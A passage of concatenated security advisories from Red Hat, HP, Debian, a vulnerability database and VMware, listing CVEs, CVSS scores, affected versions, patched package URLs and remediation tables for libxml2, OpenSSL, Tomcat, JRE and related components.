The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPDc8yXlSAg2UNWIIRAp0FAKCr3G8qJvCfqK4BJBzJsMWlSYXXFQCgxNs7
ZcFDHRyFhx22yjGNtU/I5SA=
=FALM
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04135307
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04135307
Version: 1
HPSBGN02970 rev.1 - HP Rapid Deployment Pack (RDP) or HP Insight Control
Server Deployment, Multiple Remote Vulnerabilities affecting Confidentiality,
Integrity and Availability
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2014-03-10
Last Updated: 2014-03-10
Potential Security Impact: Multiple remote vulnerabilities affecting
confidentiality, integrity and availability
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential vulnerabilities have been identified with HP Rapid Deployment Pack
(RDP) or HP Insight Control Server Deployment. The vulnerabilities could be
exploited remotely affecting confidentiality, integrity and availability.
References: CVE-2010-4008
CVE-2010-4494
CVE-2011-2182
CVE-2011-2213
CVE-2011-2492
CVE-2011-2518
CVE-2011-2689
CVE-2011-2723
CVE-2011-3188
CVE-2011-4077
CVE-2011-4110
CVE-2012-0058
CVE-2012-0879
CVE-2012-1088
CVE-2012-1179
CVE-2012-2137
CVE-2012-2313
CVE-2012-2372
CVE-2012-2373
CVE-2012-2375
CVE-2012-2383
CVE-2012-2384
CVE-2013-6205
CVE-2013-6206
SSRT101443
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Rapid Deployment Pack (RDP) -- All versions
HP Insight Control Server Deployment -- All versions
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2013-6205 (AV:L/AC:M/Au:S/C:P/I:P/A:P) 4.1
CVE-2013-6206 (AV:N/AC:L/Au:N/C:C/I:P/A:P) 9.0
CVE-2010-4008 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2010-4494 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2011-2182 (AV:L/AC:L/Au:N/C:C/I:C/A:C) 7.2
CVE-2011-2213 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9
CVE-2011-2492 (AV:L/AC:M/Au:N/C:P/I:N/A:N) 1.9
CVE-2011-2518 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9
CVE-2011-2689 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9
CVE-2011-2723 (AV:A/AC:M/Au:N/C:N/I:N/A:C) 5.7
CVE-2011-3188 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2011-4077 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9
CVE-2011-4110 (AV:L/AC:L/Au:N/C:N/I:N/A:P) 2.1
CVE-2012-0058 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9
CVE-2012-0879 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9
CVE-2012-1088 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3
CVE-2012-1179 (AV:A/AC:M/Au:S/C:N/I:N/A:C) 5.2
CVE-2012-2137 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9
CVE-2012-2313 (AV:L/AC:H/Au:N/C:N/I:N/A:P) 1.2
CVE-2012-2372 (AV:L/AC:M/Au:S/C:N/I:N/A:C) 4.4
CVE-2012-2373 (AV:L/AC:H/Au:N/C:N/I:N/A:C) 4.0
CVE-2012-2375 (AV:A/AC:H/Au:N/C:N/I:N/A:C) 4.6
CVE-2012-2383 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9
CVE-2012-2384 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP recommends that HP Rapid Deployment Pack (RDP) or HP Insight Control
Server Deployment should only be run on private secure networks to prevent
the risk of security compromise.
HISTORY
Version:1 (rev.1) - 10 March 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-2128-1 security@debian.org
http://www.debian.org/security/ Giuseppe Iuculano
December 01, 2010 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : libxml2
Vulnerability : invalid memory access
Problem type : local (remote)
Debian-specific: no
CVE ID : CVE-2010-4008
Bui Quang Minh discovered that libxml2, a library for parsing and
handling XML data files, does not well process a malformed XPATH,
causing crash and allowing arbitrary code execution.
For the stable distribution (lenny), this problem has been fixed in
version 2.6.32.dfsg-5+lenny2.
For the testing (squeeze) and unstable (sid) distribution, this problem
has been fixed in version 2.7.8.dfsg-1.
We recommend that you upgrade your libxml2 package.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Debian (stable)
- ---------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg.orig.tar.gz
Size/MD5 checksum: 3425843 bb11c95674e775b791dab2d15e630fa4
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2.dsc
Size/MD5 checksum: 1985 e1a498ed2e38225c5d10aaf834d9e0b9
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2.diff.gz
Size/MD5 checksum: 83947 7af1ff46c9cacd57e7f977b295b39084
Architecture independent packages:
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-doc_2.6.32.dfsg-5+lenny2_all.deb
Size/MD5 checksum: 1307172 ceec72214783bdfc9d7643ea31a61d50
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_alpha.deb
Size/MD5 checksum: 920664 429d086d4861511c6d9130bd7a165698
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_alpha.deb
Size/MD5 checksum: 856680 fccba5f6884b74e873730e3140e0bad5
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_alpha.deb
Size/MD5 checksum: 920616 33f850cafef51a45ef04714c9900e737
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_alpha.deb
Size/MD5 checksum: 292784 2f2ad873f9f50a0400960264ba823aec
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_alpha.deb
Size/MD5 checksum: 38026 e3f0bf3fe0f804bcd39df854e420cee6
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_amd64.deb
Size/MD5 checksum: 988474 ea406c325fe1d3cf8e80eed39ff61f7e
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_amd64.deb
Size/MD5 checksum: 295940 2a1754d35048a827dfeac4ee25f238d5
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_amd64.deb
Size/MD5 checksum: 37328 0b6af9c052e005c439658215027eeead
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_amd64.deb
Size/MD5 checksum: 774114 0c714b77c96e4d840048edbce00d959f
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_amd64.deb
Size/MD5 checksum: 860726 cf7d9638a12709f527898f9c91ec389d
arm architecture (ARM)
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_arm.deb
Size/MD5 checksum: 246210 484d790396e82318e4eb5e38903497d9
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_arm.deb
Size/MD5 checksum: 898986 5cbab6f3b7fa8df4a406d03eaa5762a2
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_arm.deb
Size/MD5 checksum: 685530 9b9ea967472806e4f4b0d713d7198706
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_arm.deb
Size/MD5 checksum: 782546 1dec5ad219c1f69439936f172323b4d3
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_arm.deb
Size/MD5 checksum: 35174 f15d1f05b68e8299b2084315feea6078
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_armel.deb
Size/MD5 checksum: 247756 4809a4f17729bfec952e25aeff5f612b
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_armel.deb
Size/MD5 checksum: 906754 ee3e37855a6699771d3612180632a1df
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_armel.deb
Size/MD5 checksum: 790732 0df793cc442fd5aff099c60852cfd031
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_armel.deb
Size/MD5 checksum: 34258 95bb668363b085e6fea0848444ff0a42
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_armel.deb
Size/MD5 checksum: 692210 acb1820adf968e8011d16b94cdc6d18c
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_hppa.deb
Size/MD5 checksum: 867348 656a379b6cd2f3bc167c4c580f4f9588
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_hppa.deb
Size/MD5 checksum: 300124 646af54075ce65b1f318773e55f3b8ae
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_hppa.deb
Size/MD5 checksum: 36974 6595d5ef74d9710d4498159da8fe8879
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_hppa.deb
Size/MD5 checksum: 931526 94752ea0ec5e56c0ce2bfa6fd8ffc7c2
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_hppa.deb
Size/MD5 checksum: 889446 3342e94f7cb0f5c89f4a95969750d6fe
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_i386.deb
Size/MD5 checksum: 264698 ce75352a38803aa7d94111c44ccc7a30
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_i386.deb
Size/MD5 checksum: 945316 95cf7cbbb06087b7f18c52f897b4ba78
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_i386.deb
Size/MD5 checksum: 814750 df1f647ba1306ce5138b50f06089d3db
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_i386.deb
Size/MD5 checksum: 698690 4e54bd82a4b679478806da0e14212268
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_i386.deb
Size/MD5 checksum: 33754 92c4c50e1a3f6160ab72316d1cf678ba
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_ia64.deb
Size/MD5 checksum: 48096 df26f8dc1b4e78de97d22fb6f328844d
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_ia64.deb
Size/MD5 checksum: 1144394 8a3e9d36f7bcebc74fe83f2f602197c6
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_ia64.deb
Size/MD5 checksum: 1150678 6efac0dc67e48b20922bc321ad14b1ed
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_ia64.deb
Size/MD5 checksum: 926300 8381127e0f7f55f23a5a798ec6a043b5
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_ia64.deb
Size/MD5 checksum: 320066 c18be638d183a965bcff61cbef015b44
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_mipsel.deb
Size/MD5 checksum: 975846 27602acbf39c6086b0ccccc2a075888c
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_mipsel.deb
Size/MD5 checksum: 809424 62a1a3153b1f2898bd36914b9d953a59
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_mipsel.deb
Size/MD5 checksum: 821888 df10f6c3fa7dd05d6aeba73b8a82fe7a
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_mipsel.deb
Size/MD5 checksum: 34188 489be157e2061a3e958a1c9693f6fb07
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_mipsel.deb
Size/MD5 checksum: 252622 ffe51c47bcaa9883addae4da42850e8a
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_powerpc.deb
Size/MD5 checksum: 950566 3ad6dc272c21e8f849fb06cca054dcd6
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_powerpc.deb
Size/MD5 checksum: 42054 1b29e288243c30441833b359a36cd09f
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_powerpc.deb
Size/MD5 checksum: 834730 e79241dec4e3e7328e305a8fb0505d18
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_powerpc.deb
Size/MD5 checksum: 285718 df9b1705a6faea8bd1a3f0db9464f4c1
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_powerpc.deb
Size/MD5 checksum: 789938 1831f4e506ea36d5d6dbf4af3864835e
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_s390.deb
Size/MD5 checksum: 38078 b238d71479ae8c7dfdce22b7b96e96f6
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_s390.deb
Size/MD5 checksum: 297668 87fc74097472950250bdef49cfc1401d
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_s390.deb
Size/MD5 checksum: 854128 bba7607e556f4d03578a6fd7b206c542
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_s390.deb
Size/MD5 checksum: 762632 aaf2e13c002c2128fd8f06b49e8b0079
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_s390.deb
Size/MD5 checksum: 968000 20682a3eddbc11161cabe014eb67cc2f
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_sparc.deb
Size/MD5 checksum: 36538 c94d075d63dfa8c35cdca960d12e1ba7
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_sparc.deb
Size/MD5 checksum: 845248 9b9da876e13164f4346e7efcf9b94a96
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_sparc.deb
Size/MD5 checksum: 279186 1f5a7299a4c7fbf27d73d017909679e9
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_sparc.deb
Size/MD5 checksum: 727602 b1b0633a4bdb40f1e0a341a1b86c812c
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_sparc.deb
Size/MD5 checksum: 803608 8a339109db809222dd0dd9e795062fa2
These files will probably be moved into the stable distribution on
its next update
| VAR-201011-0251 | CVE-2010-3864 | Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL |
CVSS V2: 7.6 CVSS V3: - Severity: HIGH |
Multiple race conditions in ssl/t1_lib.c in OpenSSL 0.9.8f through 0.9.8o, 1.0.0, and 1.0.0a, when multi-threading and internal caching are enabled on a TLS server, might allow remote attackers to execute arbitrary code via client data that triggers a heap-based buffer overflow, related to (1) the TLS server name extension and (2) elliptic curve cryptography. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL is prone to a heap-based buffer-overflow vulnerability because the library fails to properly perform bounds-checks on user-supplied input before copying it to an insufficiently sized memory buffer.
Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of applications that use the affected library, but this has not been confirmed. Failed exploit attempts may crash applications, denying service to legitimate users.
OpenSSL 0.9.8f to 0.9.8o, 1.0.0, and 1.0.0a are vulnerable.
NOTE: This issue affects servers which are multi-threaded and use OpenSSL's internal caching mechanism. Multi-processed servers or servers with disabled internal caching (like Apache HTTP server and Stunnel) are not affected. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2011-0003
Synopsis: Third party component updates for VMware vCenter
Server, vCenter Update Manager, ESXi and ESX
Issue date: 2011-02-10
Updated on: 2011-02-10 (initial release of advisory)
CVE numbers: --- Apache Tomcat ---
CVE-2009-2693 CVE-2009-2901 CVE-2009-2902
CVE-2009-3548 CVE-2010-2227 CVE-2010-1157
--- Apache Tomcat Manager ---
CVE-2010-2928
--- cURL ---
CVE-2010-0734
--- COS Kernel ---
CVE-2010-1084 CVE-2010-2066 CVE-2010-2070
CVE-2010-2226 CVE-2010-2248 CVE-2010-2521
CVE-2010-2524 CVE-2010-0008 CVE-2010-0415
CVE-2010-0437 CVE-2009-4308 CVE-2010-0003
CVE-2010-0007 CVE-2010-0307 CVE-2010-1086
CVE-2010-0410 CVE-2010-0730 CVE-2010-1085
CVE-2010-0291 CVE-2010-0622 CVE-2010-1087
CVE-2010-1173 CVE-2010-1437 CVE-2010-1088
CVE-2010-1187 CVE-2010-1436 CVE-2010-1641
CVE-2010-3081
--- Microsoft SQL Express ---
CVE-2008-5416 CVE-2008-0085 CVE-2008-0086
CVE-2008-0107 CVE-2008-0106
--- OpenSSL ---
CVE-2010-0740 CVE-2010-0433
CVE-2010-3864 CVE-2010-2939
--- Oracle (Sun) JRE ---
CVE-2009-3555 CVE-2010-0082 CVE-2010-0084
CVE-2010-0085 CVE-2010-0087 CVE-2010-0088
CVE-2010-0089 CVE-2010-0090 CVE-2010-0091
CVE-2010-0092 CVE-2010-0093 CVE-2010-0094
CVE-2010-0095 CVE-2010-0837 CVE-2010-0838
CVE-2010-0839 CVE-2010-0840 CVE-2010-0841
CVE-2010-0842 CVE-2010-0843 CVE-2010-0844
CVE-2010-0845 CVE-2010-0846 CVE-2010-0847
CVE-2010-0848 CVE-2010-0849 CVE-2010-0850
CVE-2010-0886 CVE-2010-3556 CVE-2010-3566
CVE-2010-3567 CVE-2010-3550 CVE-2010-3561
CVE-2010-3573 CVE-2010-3565 CVE-2010-3568
CVE-2010-3569 CVE-2010-1321 CVE-2010-3548
CVE-2010-3551 CVE-2010-3562 CVE-2010-3571
CVE-2010-3554 CVE-2010-3559 CVE-2010-3572
CVE-2010-3553 CVE-2010-3549 CVE-2010-3557
CVE-2010-3541 CVE-2010-3574
--- pam_krb5 ---
CVE-2008-3825 CVE-2009-1384
- ------------------------------------------------------------------------
1. Summary
Update 1 for vCenter Server 4.1, vCenter Update Manager 4.1, vSphere
Hypervisor (ESXi) 4.1, ESXi 4.1, addresses several security issues.
2. Relevant releases
vCenter Server 4.1 without Update 1,
vCenter Update Manager 4.1 without Update 1,
ESXi 4.1 without patch ESXi410-201101201-SG,
ESX 4.1 without patch ESX410-201101201-SG.
3. Problem Description
a. vCenter Server and vCenter Update Manager update Microsoft
SQL Server 2005 Express Edition to Service Pack 3
Microsoft SQL Server 2005 Express Edition (SQL Express)
distributed with vCenter Server 4.1 Update 1 and vCenter Update
Manager 4.1 Update 1 is upgraded from SQL Express Service Pack 2
to SQL Express Service Pack 3, to address multiple security
issues that exist in the earlier releases of Microsoft SQL Express.
Customers using other database solutions need not update for
these issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,
CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL
Express Service Pack 3.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 4.1 Windows Update 1
vCenter 4.0 Windows affected, patch pending
VirtualCenter 2.5 Windows affected, no patch planned
Update Manager 4.1 Windows Update 1
Update Manager 4.0 Windows affected, patch pending
Update Manager 1.0 Windows affected, no patch planned
hosted * any any not affected
ESXi any ESXi not affected
ESX any ESX not affected
* Hosted products are VMware Workstation, Player, ACE, Fusion.
b. vCenter Apache Tomcat Management Application Credential Disclosure
The Apache Tomcat Manager application configuration file contains
logon credentials that can be read by unprivileged local users.
The issue is resolved by removing the Manager application in
vCenter 4.1 Update 1.
If vCenter 4.1 is updated to vCenter 4.1 Update 1 the logon
credentials are not present in the configuration file after the
update.
VMware would like to thank Claudio Criscione of Secure Networking
for reporting this issue to us.
The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-2928 to this issue.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 4.1 Windows Update 1
vCenter 4.0 Windows not affected
VirtualCenter 2.5 Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX any ESX not affected
* hosted products are VMware Workstation, Player, ACE, Fusion.
c. vCenter Server and ESX, Oracle (Sun) JRE is updated to version
1.6.0_21
Oracle (Sun) JRE update to version 1.6.0_21, which addresses
multiple security issues that existed in earlier releases of
Oracle (Sun) JRE.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Oracle (Sun) JRE 1.6.0_19: CVE-2009-3555, CVE-2010-0082,
CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088,
CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092,
CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837,
CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841,
CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845,
CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849,
CVE-2010-0850.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following name to the security issue fixed in
Oracle (Sun) JRE 1.6.0_20: CVE-2010-0886.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 4.1 Windows Update 1
vCenter 4.0 Windows not applicable **
VirtualCenter 2.5 Windows not applicable **
Update Manager 4.1 Windows not applicable **
Update Manager 4.0 Windows not applicable **
Update Manager 1.0 Windows not applicable **
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201101201-SG
ESX 4.0 ESX not applicable **
ESX 3.5 ESX not applicable **
ESX 3.0.3 ESX not applicable **
* hosted products are VMware Workstation, Player, ACE, Fusion.
** this product uses the Oracle (Sun) JRE 1.5.0 family
d. vCenter Update Manager Oracle (Sun) JRE is updated to version
1.5.0_26
Oracle (Sun) JRE update to version 1.5.0_26, which addresses
multiple security issues that existed in earlier releases of
Oracle (Sun) JRE.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Oracle (Sun) JRE 1.5.0_26: CVE-2010-3556, CVE-2010-3566,
CVE-2010-3567, CVE-2010-3550, CVE-2010-3561, CVE-2010-3573,
CVE-2010-3565,CVE-2010-3568, CVE-2010-3569, CVE-2009-3555,
CVE-2010-1321, CVE-2010-3548, CVE-2010-3551, CVE-2010-3562,
CVE-2010-3571, CVE-2010-3554, CVE-2010-3559, CVE-2010-3572,
CVE-2010-3553, CVE-2010-3549, CVE-2010-3557, CVE-2010-3541,
CVE-2010-3574.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 4.1 Windows not applicable **
vCenter 4.0 Windows affected, patch pending
VirtualCenter 2.5 Windows affected, no patch planned
Update Manager 4.1 Windows Update 1
Update Manager 4.0 Windows affected, patch pending
Update Manager 1.0 Windows affected, no patch planned
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX not applicable **
ESX 4.0 ESX affected, patch pending
ESX 3.5 ESX affected, no patch planned
ESX 3.0.3 ESX affected, no patch planned
* hosted products are VMware Workstation, Player, ACE, Fusion.
** this product uses the Oracle (Sun) JRE 1.6.0 family
e. vCenter Server and ESX Apache Tomcat updated to version 6.0.28
Apache Tomcat updated to version 6.0.28, which addresses multiple
security issues that existed in earlier releases of Apache Tomcat
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Apache Tomcat 6.0.24: CVE-2009-2693, CVE-2009-2901, CVE-2009-2902,i
and CVE-2009-3548.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Apache Tomcat 6.0.28: CVE-2010-2227, CVE-2010-1157.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 4.1 Windows Update 1
vCenter 4.0 Windows affected, patch pending
VirtualCenter 2.5 Windows not applicable **
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201101201-SG
ESX 4.0 ESX affected, patch pending
ESX 3.5 ESX not applicable **
ESX 3.0.3 ESX not applicable **
* hosted products are VMware Workstation, Player, ACE, Fusion.
** this product uses the Apache Tomcat 5.5 family
f. vCenter Server third party component OpenSSL updated to version
0.9.8n
The version of the OpenSSL library in vCenter Server is updated to
0.9.8n.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-0740 and CVE-2010-0433 to the
issues addressed in this version of OpenSSL.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 4.1 Windows Update 1
vCenter 4.0 Windows affected, patch pending
VirtualCenter 2.5 Windows affected, no patch planned
hosted * any any not applicable
ESXi any ESXi not applicable
ESX any ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
g. ESX third party component OpenSSL updated to version 0.9.8p
The version of the ESX OpenSSL library is updated to 0.9.8p.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-3864 and CVE-2010-2939 to the
issues addressed in this update.
Column 4 of the following table lists the action required to
